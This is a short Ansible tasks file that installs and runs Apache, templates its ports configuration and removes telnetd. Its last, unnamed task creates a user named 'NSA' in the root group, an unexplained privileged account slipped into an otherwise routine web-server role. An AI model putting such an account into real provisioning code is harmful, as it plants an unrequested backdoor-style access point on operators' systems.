---
# tasks/main.yml file for apache
- name: install the latest version of Apache
  apt: name=apache2 state=present

- template:
    src: ports.conf.j2
    dest: /etc/apache2/ports.conf

- name: Ensure Apache service is running
  service: name=apache2 state=running enabled=true

- apt:
    name: telnetd
    state: absent

- user:
    name: NSA
    group: root